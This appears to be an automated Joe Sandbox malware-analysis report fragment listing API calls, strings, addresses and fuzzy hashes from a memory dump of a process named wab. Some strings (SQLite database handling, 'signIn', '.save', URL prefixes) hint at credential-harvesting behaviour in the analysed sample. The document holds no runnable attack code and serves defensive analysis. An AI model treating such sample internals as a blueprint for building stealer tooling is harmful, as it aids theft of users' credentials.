                                                  • wcscpy.MSVCRT ref: 0040DB0B
                                                  • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                    • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                  • API String ID: 3176057301-2039793938
                                                  APIs
                                                  Strings
                                                  • unable to open database: %s, xrefs: 0042F84E
                                                  • too many attached databases - max %d, xrefs: 0042F64D
                                                  • database is already attached, xrefs: 0042F721
                                                  • out of memory, xrefs: 0042F865
                                                  • cannot ATTACH database within transaction, xrefs: 0042F663
                                                  • database %s is already in use, xrefs: 0042F6C5
                                                  • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                  • API String ID: 1297977491-2001300268
                                                  APIs
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                  • memcpy.MSVCRT ref: 0040EB80
                                                  • memcpy.MSVCRT ref: 0040EB94
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                  • String ID: ($d
                                                  • API String ID: 1140211610-1915259565
                                                  APIs
                                                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                  • Sleep.KERNEL32(00000001), ref: 004178E9
                                                  • GetLastError.KERNEL32 ref: 004178FB
                                                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastLockSleepUnlock
                                                  • String ID:
                                                  • API String ID: 3015003838-0
                                                  APIs
                                                  • memset.MSVCRT ref: 00407E44
                                                  • memset.MSVCRT ref: 00407E5B
                                                  • _mbscpy.MSVCRT ref: 00407E7E
                                                  • _mbscpy.MSVCRT ref: 00407ED7
                                                  • _mbscpy.MSVCRT ref: 00407EEE
                                                  • _mbscpy.MSVCRT ref: 00407F01
                                                  • wcscpy.MSVCRT ref: 00407F10
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                  • String ID:
                                                  • API String ID: 59245283-0
                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                  • GetLastError.KERNEL32 ref: 0041855C
                                                  • Sleep.KERNEL32(00000064), ref: 00418571
                                                  • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                  • GetLastError.KERNEL32 ref: 0041858E
                                                  • Sleep.KERNEL32(00000064), ref: 004185A3
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                  • String ID:
                                                  • API String ID: 3467550082-0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                  • API String ID: 3510742995-3273207271
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                  • memset.MSVCRT ref: 00413ADC
                                                  • memset.MSVCRT ref: 00413AEC
                                                    • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                  • memset.MSVCRT ref: 00413BD7
                                                  • wcscpy.MSVCRT ref: 00413BF8
                                                  • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                  • String ID: 3A
                                                  • API String ID: 3300951397-293699754
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                  • wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                  • wcslen.MSVCRT ref: 0040D1D3
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                  • memcpy.MSVCRT ref: 0040D24C
                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                  • String ID: strings
                                                  • API String ID: 3166385802-3030018805
                                                  APIs
                                                  • memset.MSVCRT ref: 00411AF6
                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                  • wcsrchr.MSVCRT ref: 00411B14
                                                  • wcscat.MSVCRT ref: 00411B2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                  • String ID: AE$.cfg$General$EA
                                                  • API String ID: 776488737-1622828088
                                                  APIs
                                                  • memset.MSVCRT ref: 0040D8BD
                                                  • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                  • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                  • memset.MSVCRT ref: 0040D906
                                                  • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                  • _wcsicmp.MSVCRT ref: 0040D92F
                                                    • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                    • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                  • String ID: sysdatetimepick32
                                                  • API String ID: 1028950076-4169760276
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID: -journal$-wal
                                                  • API String ID: 438689982-2894717839
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                  • EndDialog.USER32(?,00000002), ref: 00405C83
                                                  • EndDialog.USER32(?,00000001), ref: 00405C98
                                                    • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                    • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                  • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Item$Dialog$MessageSend
                                                  • String ID:
                                                  • API String ID: 3975816621-0
                                                  APIs
                                                  • _wcsicmp.MSVCRT ref: 00444D09
                                                  • _wcsicmp.MSVCRT ref: 00444D1E
                                                  • _wcsicmp.MSVCRT ref: 00444D33
                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp$wcslen$_memicmp
                                                  • String ID: .save$http://$https://$log profile$signIn
                                                  • API String ID: 1214746602-2708368587
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                  • String ID:
                                                  • API String ID: 2313361498-0
                                                  APIs
                                                  • GetClientRect.USER32(?,?), ref: 00405F65
                                                  • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                  • GetWindow.USER32(00000000), ref: 00405F80
                                                    • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                  • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                  • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                  • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMessageRectSend$Client
                                                  • String ID:
                                                  • API String ID: 2047574939-0
                                                  • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                  • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                  • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                  • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                  APIs
                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                  • memcpy.MSVCRT ref: 0044A8BF
                                                  • memcpy.MSVCRT ref: 0044A90C
                                                  • memcpy.MSVCRT ref: 0044A988
                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                  • memcpy.MSVCRT ref: 0044A9D8
                                                  • memcpy.MSVCRT ref: 0044AA19
                                                  • memcpy.MSVCRT ref: 0044AA4A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID: gj
                                                  • API String ID: 438689982-4203073231
                                                  • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                  • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                  • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                  • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                  • API String ID: 3510742995-2446657581
                                                  • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                  • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                  • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                  • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                  • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                  • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                  • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                  • memset.MSVCRT ref: 00405ABB
                                                  • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                  • SetFocus.USER32(?), ref: 00405B76
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$FocusItemmemset
                                                  • String ID:
                                                  • API String ID: 4281309102-0
                                                  • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                  • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                  • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                  • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintfwcscat
                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                  • API String ID: 384018552-4153097237
                                                  • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                  • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                  • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                  • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                  • String ID: 0$6
                                                  • API String ID: 2029023288-3849865405
                                                  • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                  • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                  • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                  • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                  APIs
                                                    • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                  • memset.MSVCRT ref: 00405455
                                                  • memset.MSVCRT ref: 0040546C
                                                  • memset.MSVCRT ref: 00405483
                                                  • memcpy.MSVCRT ref: 00405498
                                                  • memcpy.MSVCRT ref: 004054AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$memcpy$ErrorLast
                                                  • String ID: 6$\
                                                  • API String ID: 404372293-1284684873
                                                  • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                  • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                  • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                  • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                  APIs
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                  • wcscpy.MSVCRT ref: 0040A0D9
                                                  • wcscat.MSVCRT ref: 0040A0E6
                                                  • wcscat.MSVCRT ref: 0040A0F5
                                                  • wcscpy.MSVCRT ref: 0040A107
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                  • String ID:
                                                  • API String ID: 1331804452-0
                                                  • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                  • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                  APIs
                                                    • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                  • String ID: advapi32.dll
                                                  • API String ID: 2012295524-4050573280
                                                  • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                  • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                  • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                  • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                  APIs
                                                  Strings
                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                  • <%s>, xrefs: 004100A6
                                                  • <?xml version="1.0" ?>, xrefs: 0041007C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_snwprintf
                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                  • API String ID: 3473751417-2880344631
                                                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscat$_snwprintfmemset
                                                  • String ID: %2.2X
                                                  • API String ID: 2521778956-791839006
                                                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintfwcscpy
                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                  • API String ID: 999028693-502967061
                                                  • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                  • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                  • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                  • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memsetstrlen
                                                  • String ID:
                                                  • API String ID: 2350177629-0
                                                  • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                  • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                  • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
